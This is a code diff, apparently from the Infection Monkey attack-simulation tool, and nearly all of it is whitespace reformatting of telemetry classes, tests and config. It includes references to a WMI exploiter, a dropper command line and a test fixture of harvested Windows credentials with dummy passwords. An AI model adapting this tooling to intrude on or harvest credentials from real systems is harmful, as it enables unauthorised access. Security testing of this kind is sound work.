{"username":"monk3y", "ntlm_hash":"", "password":"canyoufindm3", "lm_hash":""}, {"username": "monk3y", "ntlm_hash": "", "password": "canyoufindm3", "lm_hash": ""},
{"username":"monkey", "ntlm_hash":"", "password":"canyoufindme2", "lm_hash":""}, {"username": "monkey", "ntlm_hash": "", "password": "canyoufindme2", "lm_hash": ""},
{ {
"username":"monkey@monkey.com", "username": "monkey@monkey.com",
"ntlm_hash":"", "ntlm_hash": "",
"password":"canyoufindme1", "password": "canyoufindme1",
"lm_hash":"", "lm_hash": "",
}, },
{"username":"test", "ntlm_hash":"", "password":"canyoufindit", "lm_hash":""}, {"username": "test", "ntlm_hash": "", "password": "canyoufindit", "lm_hash": ""},
] ]
results = [result.to_dict() for result in results] results = [result.to_dict() for result in results]
[self.assertTrue(test_dict in results) for test_dict in test_dicts] [self.assertTrue(test_dict in results) for test_dict in test_dicts]


@ -10,8 +10,8 @@ class WindowsCredentials:
def to_dict(self) -> Dict: def to_dict(self) -> Dict:
return { return {
"username":self.username, "username": self.username,
"password":self.password, "password": self.password,
"ntlm_hash":self.ntlm_hash, "ntlm_hash": self.ntlm_hash,
"lm_hash":self.lm_hash, "lm_hash": self.lm_hash,
} }
View File
@ -17,7 +17,7 @@ WMI_CLASSES = {
# monkey should run as *** SYSTEM *** !!! # monkey should run as *** SYSTEM *** !!!
# #
WMI_LDAP_CLASSES = { WMI_LDAP_CLASSES = {
"ds_user":( "ds_user": (
"DS_sAMAccountName", "DS_sAMAccountName",
"DS_userPrincipalName", "DS_userPrincipalName",
"DS_sAMAccountType", "DS_sAMAccountType",
@ -36,7 +36,7 @@ WMI_LDAP_CLASSES = {
"DS_logonCount", "DS_logonCount",
"DS_accountExpires", "DS_accountExpires",
), ),
"ds_group":( "ds_group": (
"DS_whenChanged", "DS_whenChanged",
"DS_whenCreated", "DS_whenCreated",
"DS_sAMAccountName", "DS_sAMAccountName",
@ -52,7 +52,7 @@ WMI_LDAP_CLASSES = {
"DS_distinguishedName", "DS_distinguishedName",
"ADSIPath", "ADSIPath",
), ),
"ds_computer":( "ds_computer": (
"DS_dNSHostName", "DS_dNSHostName",
"ADSIPath", "ADSIPath",
"DS_accountExpires", "DS_accountExpires",
View File
@ -44,8 +44,7 @@ class WindowsSystemSingleton(_SystemSingleton):
if not handle: if not handle:
LOG.error( LOG.error(
"Cannot acquire system singleton %r, unknown error %d", self._mutex_name, "Cannot acquire system singleton %r, unknown error %d", self._mutex_name, last_error
last_error
) )
return False return False
if winerror.ERROR_ALREADY_EXISTS == last_error: if winerror.ERROR_ALREADY_EXISTS == last_error:
View File
@ -18,4 +18,4 @@ class AttackTelem(BaseTelem):
telem_category = TelemCategoryEnum.ATTACK telem_category = TelemCategoryEnum.ATTACK
def get_data(self): def get_data(self):
return {"status":self.status.value, "technique":self.technique} return {"status": self.status.value, "technique": self.technique}
View File
@ -15,5 +15,5 @@ class T1005Telem(AttackTelem):
def get_data(self): def get_data(self):
data = super(T1005Telem, self).get_data() data = super(T1005Telem, self).get_data()
data.update({"gathered_data_type":self.gathered_data_type, "info":self.info}) data.update({"gathered_data_type": self.gathered_data_type, "info": self.info})
return data return data
View File
@ -15,5 +15,5 @@ class T1064Telem(AttackTelem):
def get_data(self): def get_data(self):
data = super(T1064Telem, self).get_data() data = super(T1064Telem, self).get_data()
data.update({"usage":self.usage}) data.update({"usage": self.usage})
return data return data
View File
@ -17,5 +17,5 @@ class T1105Telem(AttackTelem):
def get_data(self): def get_data(self):
data = super(T1105Telem, self).get_data() data = super(T1105Telem, self).get_data()
data.update({"filename":self.filename, "src":self.src, "dst":self.dst}) data.update({"filename": self.filename, "src": self.src, "dst": self.dst})
return data return data
View File
@ -13,5 +13,5 @@ class T1107Telem(AttackTelem):
def get_data(self): def get_data(self):
data = super(T1107Telem, self).get_data() data = super(T1107Telem, self).get_data()
data.update({"path":self.path}) data.update({"path": self.path})
return data return data
View File
@ -18,5 +18,5 @@ class T1197Telem(VictimHostTelem):
def get_data(self): def get_data(self):
data = super(T1197Telem, self).get_data() data = super(T1197Telem, self).get_data()
data.update({"usage":self.usage}) data.update({"usage": self.usage})
return data return data
View File
@ -14,5 +14,5 @@ class T1222Telem(VictimHostTelem):
def get_data(self): def get_data(self):
data = super(T1222Telem, self).get_data() data = super(T1222Telem, self).get_data()
data.update({"command":self.command}) data.update({"command": self.command})
return data return data
View File
@ -13,5 +13,5 @@ class UsageTelem(AttackTelem):
def get_data(self): def get_data(self):
data = super(UsageTelem, self).get_data() data = super(UsageTelem, self).get_data()
data.update({"usage":self.usage}) data.update({"usage": self.usage})
return data return data
View File
@ -13,9 +13,9 @@ class VictimHostTelem(AttackTelem):
:param machine: VictimHost obj from model/host.py :param machine: VictimHost obj from model/host.py
""" """
super(VictimHostTelem, self).__init__(technique, status) super(VictimHostTelem, self).__init__(technique, status)
self.machine = {"domain_name":machine.domain_name, "ip_addr":machine.ip_addr} self.machine = {"domain_name": machine.domain_name, "ip_addr": machine.ip_addr}
def get_data(self): def get_data(self):
data = super(VictimHostTelem, self).get_data() data = super(VictimHostTelem, self).get_data()
data.update({"machine":self.machine}) data.update({"machine": self.machine})
return data return data
View File
@ -19,9 +19,9 @@ class ExploitTelem(BaseTelem):
def get_data(self): def get_data(self):
return { return {
"result":self.result, "result": self.result,
"machine":self.exploiter.host.__dict__, "machine": self.exploiter.host.__dict__,
"exploiter":self.exploiter.__class__.__name__, "exploiter": self.exploiter.__class__.__name__,
"info":self.exploiter.exploit_info, "info": self.exploiter.exploit_info,
"attempts":self.exploiter.exploit_attempts, "attempts": self.exploiter.exploit_attempts,
} }
View File
@ -22,11 +22,11 @@ class PostBreachTelem(BaseTelem):
def get_data(self): def get_data(self):
return { return {
"command":self.pba.command, "command": self.pba.command,
"result":self.result, "result": self.result,
"name":self.pba.name, "name": self.pba.name,
"hostname":self.hostname, "hostname": self.hostname,
"ip":self.ip, "ip": self.ip,
} }
@staticmethod @staticmethod
View File
@ -16,4 +16,4 @@ class ScanTelem(BaseTelem):
telem_category = TelemCategoryEnum.SCAN telem_category = TelemCategoryEnum.SCAN
def get_data(self): def get_data(self):
return {"machine":self.machine.as_dict(), "service_count":len(self.machine.services)} return {"machine": self.machine.as_dict(), "service_count": len(self.machine.services)}
View File
@ -14,4 +14,4 @@ class ScoutSuiteTelem(BaseTelem):
telem_category = TelemCategoryEnum.SCOUTSUITE telem_category = TelemCategoryEnum.SCOUTSUITE
def get_data(self): def get_data(self):
return {"data":self.provider_data} return {"data": self.provider_data}
View File
@ -17,4 +17,4 @@ class StateTelem(BaseTelem):
telem_category = TelemCategoryEnum.STATE telem_category = TelemCategoryEnum.STATE
def get_data(self): def get_data(self):
return {"done":self.is_done, "version":self.version} return {"done": self.is_done, "version": self.version}
View File
@ -16,7 +16,7 @@ def attack_telem_test_instance():
def test_attack_telem_send(attack_telem_test_instance, spy_send_telemetry): def test_attack_telem_send(attack_telem_test_instance, spy_send_telemetry):
attack_telem_test_instance.send() attack_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":TECHNIQUE} expected_data = {"status": STATUS.value, "technique": TECHNIQUE}
expected_data = json.dumps(expected_data, cls=attack_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=attack_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
View File
@ -18,10 +18,10 @@ def T1005_telem_test_instance():
def test_T1005_send(T1005_telem_test_instance, spy_send_telemetry): def test_T1005_send(T1005_telem_test_instance, spy_send_telemetry):
T1005_telem_test_instance.send() T1005_telem_test_instance.send()
expected_data = { expected_data = {
"status":STATUS.value, "status": STATUS.value,
"technique":"T1005", "technique": "T1005",
"gathered_data_type":GATHERED_DATA_TYPE, "gathered_data_type": GATHERED_DATA_TYPE,
"info":INFO, "info": INFO,
} }
expected_data = json.dumps(expected_data, cls=T1005_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1005_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
View File
@ -16,7 +16,7 @@ def T1035_telem_test_instance():
def test_T1035_send(T1035_telem_test_instance, spy_send_telemetry): def test_T1035_send(T1035_telem_test_instance, spy_send_telemetry):
T1035_telem_test_instance.send() T1035_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1035", "usage":USAGE.name} expected_data = {"status": STATUS.value, "technique": "T1035", "usage": USAGE.name}
expected_data = json.dumps(expected_data, cls=T1035_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1035_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack" assert spy_send_telemetry.telem_category == "attack"
View File
@ -16,7 +16,7 @@ def T1064_telem_test_instance():
def test_T1064_send(T1064_telem_test_instance, spy_send_telemetry): def test_T1064_send(T1064_telem_test_instance, spy_send_telemetry):
T1064_telem_test_instance.send() T1064_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1064", "usage":USAGE_STR} expected_data = {"status": STATUS.value, "technique": "T1064", "usage": USAGE_STR}
expected_data = json.dumps(expected_data, cls=T1064_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1064_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack" assert spy_send_telemetry.telem_category == "attack"
View File
@ -19,11 +19,11 @@ def T1105_telem_test_instance():
def test_T1105_send(T1105_telem_test_instance, spy_send_telemetry): def test_T1105_send(T1105_telem_test_instance, spy_send_telemetry):
T1105_telem_test_instance.send() T1105_telem_test_instance.send()
expected_data = { expected_data = {
"status":STATUS.value, "status": STATUS.value,
"technique":"T1105", "technique": "T1105",
"filename":FILENAME, "filename": FILENAME,
"src":SRC_IP, "src": SRC_IP,
"dst":DST_IP, "dst": DST_IP,
} }
expected_data = json.dumps(expected_data, cls=T1105_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1105_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
View File
@ -16,7 +16,7 @@ def T1106_telem_test_instance():
def test_T1106_send(T1106_telem_test_instance, spy_send_telemetry): def test_T1106_send(T1106_telem_test_instance, spy_send_telemetry):
T1106_telem_test_instance.send() T1106_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1106", "usage":USAGE.name} expected_data = {"status": STATUS.value, "technique": "T1106", "usage": USAGE.name}
expected_data = json.dumps(expected_data, cls=T1106_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1106_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack" assert spy_send_telemetry.telem_category == "attack"
View File
@ -16,7 +16,7 @@ def T1107_telem_test_instance():
def test_T1107_send(T1107_telem_test_instance, spy_send_telemetry): def test_T1107_send(T1107_telem_test_instance, spy_send_telemetry):
T1107_telem_test_instance.send() T1107_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1107", "path":PATH} expected_data = {"status": STATUS.value, "technique": "T1107", "path": PATH}
expected_data = json.dumps(expected_data, cls=T1107_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1107_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack" assert spy_send_telemetry.telem_category == "attack"
View File
@ -16,7 +16,7 @@ def T1129_telem_test_instance():
def test_T1129_send(T1129_telem_test_instance, spy_send_telemetry): def test_T1129_send(T1129_telem_test_instance, spy_send_telemetry):
T1129_telem_test_instance.send() T1129_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1129", "usage":USAGE.name} expected_data = {"status": STATUS.value, "technique": "T1129", "usage": USAGE.name}
expected_data = json.dumps(expected_data, cls=T1129_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1129_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack" assert spy_send_telemetry.telem_category == "attack"
View File
@ -21,10 +21,10 @@ def T1197_telem_test_instance():
def test_T1197_send(T1197_telem_test_instance, spy_send_telemetry): def test_T1197_send(T1197_telem_test_instance, spy_send_telemetry):
T1197_telem_test_instance.send() T1197_telem_test_instance.send()
expected_data = { expected_data = {
"status":STATUS.value, "status": STATUS.value,
"technique":"T1197", "technique": "T1197",
"machine":{"domain_name":DOMAIN_NAME, "ip_addr":IP}, "machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
"usage":USAGE_STR, "usage": USAGE_STR,
} }
expected_data = json.dumps(expected_data, cls=T1197_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1197_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
View File
@ -21,10 +21,10 @@ def T1222_telem_test_instance():
def test_T1222_send(T1222_telem_test_instance, spy_send_telemetry): def test_T1222_send(T1222_telem_test_instance, spy_send_telemetry):
T1222_telem_test_instance.send() T1222_telem_test_instance.send()
expected_data = { expected_data = {
"status":STATUS.value, "status": STATUS.value,
"technique":"T1222", "technique": "T1222",
"machine":{"domain_name":DOMAIN_NAME, "ip_addr":IP}, "machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
"command":COMMAND, "command": COMMAND,
} }
expected_data = json.dumps(expected_data, cls=T1222_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1222_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
View File
@ -18,9 +18,9 @@ def usage_telem_test_instance():
def test_usage_telem_send(usage_telem_test_instance, spy_send_telemetry): def test_usage_telem_send(usage_telem_test_instance, spy_send_telemetry):
usage_telem_test_instance.send() usage_telem_test_instance.send()
expected_data = { expected_data = {
"status":STATUS.value, "status": STATUS.value,
"technique":TECHNIQUE, "technique": TECHNIQUE,
"usage":USAGE.name, "usage": USAGE.name,
} }
expected_data = json.dumps(expected_data, cls=usage_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=usage_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
View File
@ -21,9 +21,9 @@ def victim_host_telem_test_instance():
def test_victim_host_telem_send(victim_host_telem_test_instance, spy_send_telemetry): def test_victim_host_telem_send(victim_host_telem_test_instance, spy_send_telemetry):
victim_host_telem_test_instance.send() victim_host_telem_test_instance.send()
expected_data = { expected_data = {
"status":STATUS.value, "status": STATUS.value,
"technique":TECHNIQUE, "technique": TECHNIQUE,
"machine":{"domain_name":DOMAIN_NAME, "ip_addr":IP}, "machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
} }
expected_data = json.dumps(expected_data, cls=victim_host_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=victim_host_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
View File
@ -10,24 +10,24 @@ DOMAIN_NAME = "domain-name"
IP = "0.0.0.0" IP = "0.0.0.0"
HOST = VictimHost(IP, DOMAIN_NAME) HOST = VictimHost(IP, DOMAIN_NAME)
HOST_AS_DICT = { HOST_AS_DICT = {
"ip_addr":IP, "ip_addr": IP,
"domain_name":DOMAIN_NAME, "domain_name": DOMAIN_NAME,
"os":{}, "os": {},
"services":{}, "services": {},
"icmp":False, "icmp": False,
"monkey_exe":None, "monkey_exe": None,
"default_tunnel":None, "default_tunnel": None,
"default_server":None, "default_server": None,
} }
EXPLOITER = WmiExploiter(HOST) EXPLOITER = WmiExploiter(HOST)
EXPLOITER_NAME = "WmiExploiter" EXPLOITER_NAME = "WmiExploiter"
EXPLOITER_INFO = { EXPLOITER_INFO = {
"display_name":WmiExploiter._EXPLOITED_SERVICE, "display_name": WmiExploiter._EXPLOITED_SERVICE,
"started":"", "started": "",
"finished":"", "finished": "",
"vulnerable_urls":[], "vulnerable_urls": [],
"vulnerable_ports":[], "vulnerable_ports": [],
"executed_cmds":[], "executed_cmds": [],
} }
EXPLOITER_ATTEMPTS = [] EXPLOITER_ATTEMPTS = []
RESULT = False RESULT = False
@ -41,11 +41,11 @@ def exploit_telem_test_instance():
def test_exploit_telem_send(exploit_telem_test_instance, spy_send_telemetry): def test_exploit_telem_send(exploit_telem_test_instance, spy_send_telemetry):
exploit_telem_test_instance.send() exploit_telem_test_instance.send()
expected_data = { expected_data = {
"result":RESULT, "result": RESULT,
"machine":HOST_AS_DICT, "machine": HOST_AS_DICT,
"exploiter":EXPLOITER_NAME, "exploiter": EXPLOITER_NAME,
"info":EXPLOITER_INFO, "info": EXPLOITER_INFO,
"attempts":EXPLOITER_ATTEMPTS, "attempts": EXPLOITER_ATTEMPTS,
} }
expected_data = json.dumps(expected_data, cls=exploit_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=exploit_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
View File
@ -20,18 +20,18 @@ class StubSomePBA:
@pytest.fixture @pytest.fixture
def post_breach_telem_test_instance(monkeypatch): def post_breach_telem_test_instance(monkeypatch):
PBA = StubSomePBA() PBA = StubSomePBA()
monkeypatch.setattr(PostBreachTelem, "_get_hostname_and_ip", lambda:(HOSTNAME, IP)) monkeypatch.setattr(PostBreachTelem, "_get_hostname_and_ip", lambda: (HOSTNAME, IP))
return PostBreachTelem(PBA, RESULT) return PostBreachTelem(PBA, RESULT)
def test_post_breach_telem_send(post_breach_telem_test_instance, spy_send_telemetry): def test_post_breach_telem_send(post_breach_telem_test_instance, spy_send_telemetry):
post_breach_telem_test_instance.send() post_breach_telem_test_instance.send()
expected_data = { expected_data = {
"command":PBA_COMMAND, "command": PBA_COMMAND,
"result":RESULT, "result": RESULT,
"name":PBA_NAME, "name": PBA_NAME,
"hostname":HOSTNAME, "hostname": HOSTNAME,
"ip":IP, "ip": IP,
} }
expected_data = json.dumps(expected_data, cls=post_breach_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=post_breach_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
View File
@ -9,14 +9,14 @@ DOMAIN_NAME = "domain-name"
IP = "0.0.0.0" IP = "0.0.0.0"
HOST = VictimHost(IP, DOMAIN_NAME) HOST = VictimHost(IP, DOMAIN_NAME)
HOST_AS_DICT = { HOST_AS_DICT = {
"ip_addr":IP, "ip_addr": IP,
"domain_name":DOMAIN_NAME, "domain_name": DOMAIN_NAME,
"os":{}, "os": {},
"services":{}, "services": {},
"icmp":False, "icmp": False,
"monkey_exe":None, "monkey_exe": None,
"default_tunnel":None, "default_tunnel": None,
"default_server":None, "default_server": None,
} }
HOST_SERVICES = {} HOST_SERVICES = {}
@ -28,7 +28,7 @@ def scan_telem_test_instance():
def test_scan_telem_send(scan_telem_test_instance, spy_send_telemetry): def test_scan_telem_send(scan_telem_test_instance, spy_send_telemetry):
scan_telem_test_instance.send() scan_telem_test_instance.send()
expected_data = {"machine":HOST_AS_DICT, "service_count":len(HOST_SERVICES)} expected_data = {"machine": HOST_AS_DICT, "service_count": len(HOST_SERVICES)}
expected_data = json.dumps(expected_data, cls=scan_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=scan_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
View File
@ -15,7 +15,7 @@ def state_telem_test_instance():
def test_state_telem_send(state_telem_test_instance, spy_send_telemetry): def test_state_telem_send(state_telem_test_instance, spy_send_telemetry):
state_telem_test_instance.send() state_telem_test_instance.send()
expected_data = {"done":IS_DONE, "version":VERSION} expected_data = {"done": IS_DONE, "version": VERSION}
expected_data = json.dumps(expected_data, cls=state_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=state_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
View File
@ -14,7 +14,7 @@ def trace_telem_test_instance():
def test_trace_telem_send(trace_telem_test_instance, spy_send_telemetry): def test_trace_telem_send(trace_telem_test_instance, spy_send_telemetry):
trace_telem_test_instance.send() trace_telem_test_instance.send()
expected_data = {"msg":MSG} expected_data = {"msg": MSG}
expected_data = json.dumps(expected_data, cls=trace_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=trace_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
View File
@ -12,7 +12,7 @@ def tunnel_telem_test_instance():
def test_tunnel_telem_send(tunnel_telem_test_instance, spy_send_telemetry): def test_tunnel_telem_send(tunnel_telem_test_instance, spy_send_telemetry):
tunnel_telem_test_instance.send() tunnel_telem_test_instance.send()
expected_data = {"proxy":None} expected_data = {"proxy": None}
expected_data = json.dumps(expected_data, cls=tunnel_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=tunnel_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
View File
@ -21,4 +21,4 @@ class TraceTelem(BaseTelem):
telem_category = TelemCategoryEnum.TRACE telem_category = TelemCategoryEnum.TRACE
def get_data(self): def get_data(self):
return {"msg":self.msg} return {"msg": self.msg}
View File
@ -16,4 +16,4 @@ class TunnelTelem(BaseTelem):
telem_category = TelemCategoryEnum.TUNNEL telem_category = TelemCategoryEnum.TUNNEL
def get_data(self): def get_data(self):
return {"proxy":self.proxy} return {"proxy": self.proxy}
View File
@ -82,8 +82,7 @@ class AutoNewWindowsUser(AutoNewUser):
thread_handle = proc_info.hThread thread_handle = proc_info.hThread
logger.debug( logger.debug(
"Waiting for process to finish. Timeout: {}ms".format( "Waiting for process to finish. Timeout: {}ms".format(WAIT_TIMEOUT_IN_MILLISECONDS)
WAIT_TIMEOUT_IN_MILLISECONDS)
) )
# https://social.msdn.microsoft.com/Forums/vstudio/en-US/b6d6a7ae-71e9-4edb-ac8f # https://social.msdn.microsoft.com/Forums/vstudio/en-US/b6d6a7ae-71e9-4edb-ac8f
View File
@ -46,8 +46,7 @@ class WindowsUpgrader(object):
) )
monkey_cmdline = ( monkey_cmdline = (
MONKEY_CMDLINE_WINDOWS % { MONKEY_CMDLINE_WINDOWS % {"monkey_path": WormConfiguration.dropper_target_path_win_64}
"monkey_path":WormConfiguration.dropper_target_path_win_64}
+ monkey_options + monkey_options
) )
View File
@ -175,7 +175,7 @@ def init_app(mongo_url):
app = Flask(__name__) app = Flask(__name__)
api = flask_restful.Api(app) api = flask_restful.Api(app)
api.representations = {"application/json":output_json} api.representations = {"application/json": output_json}
init_app_config(app, mongo_url) init_app_config(app, mongo_url)
init_app_services(app) init_app_services(app)
View File
@ -58,12 +58,12 @@ class EnvironmentConfig:
def to_dict(self) -> Dict: def to_dict(self) -> Dict:
config_dict = { config_dict = {
"server_config":self.server_config, "server_config": self.server_config,
"deployment":self.deployment, "deployment": self.deployment,
"data_dir":self.data_dir, "data_dir": self.data_dir,
} }
if self.aws: if self.aws:
config_dict.update({"aws":self.aws}) config_dict.update({"aws": self.aws})
config_dict.update(self.user_creds.to_dict()) config_dict.update(self.user_creds.to_dict())
return config_dict return config_dict
View File
@ -13,9 +13,9 @@ STANDARD = "standard"
PASSWORD = "password" PASSWORD = "password"
ENV_DICT = { ENV_DICT = {
STANDARD:standard.StandardEnvironment, STANDARD: standard.StandardEnvironment,
AWS:aws.AwsEnvironment, AWS: aws.AwsEnvironment,
PASSWORD:password.PasswordEnvironment, PASSWORD: password.PasswordEnvironment,
} }
env = None env = None
View File
@ -9,13 +9,13 @@ class TestUserCreds(TestCase):
self.assertDictEqual(user_creds.to_dict(), {}) self.assertDictEqual(user_creds.to_dict(), {})
user_creds = UserCreds(username="Test") user_creds = UserCreds(username="Test")
self.assertDictEqual(user_creds.to_dict(), {"user":"Test"}) self.assertDictEqual(user_creds.to_dict(), {"user": "Test"})
user_creds = UserCreds(password_hash="abc1231234") user_creds = UserCreds(password_hash="abc1231234")
self.assertDictEqual(user_creds.to_dict(), {"password_hash":"abc1231234"}) self.assertDictEqual(user_creds.to_dict(), {"password_hash": "abc1231234"})
user_creds = UserCreds(username="Test", password_hash="abc1231234") user_creds = UserCreds(username="Test", password_hash="abc1231234")
self.assertDictEqual(user_creds.to_dict(), {"user":"Test", "password_hash":"abc1231234"}) self.assertDictEqual(user_creds.to_dict(), {"user": "Test", "password_hash": "abc1231234"})
def test_to_auth_user(self): def test_to_auth_user(self):
user_creds = UserCreds(username="Test", password_hash="abc1231234") user_creds = UserCreds(username="Test", password_hash="abc1231234")
View File
@ -17,9 +17,9 @@ class UserCreds:
def to_dict(self) -> Dict: def to_dict(self) -> Dict:
cred_dict = {} cred_dict = {}
if self.username: if self.username:
cred_dict.update({"user":self.username}) cred_dict.update({"user": self.username})
if self.password_hash: if self.password_hash:
cred_dict.update({"password_hash":self.password_hash}) cred_dict.update({"password_hash": self.password_hash})
return cred_dict return cred_dict
def to_auth_user(self) -> User: def to_auth_user(self) -> User:
Some files were not shown because too many files have changed in this diff.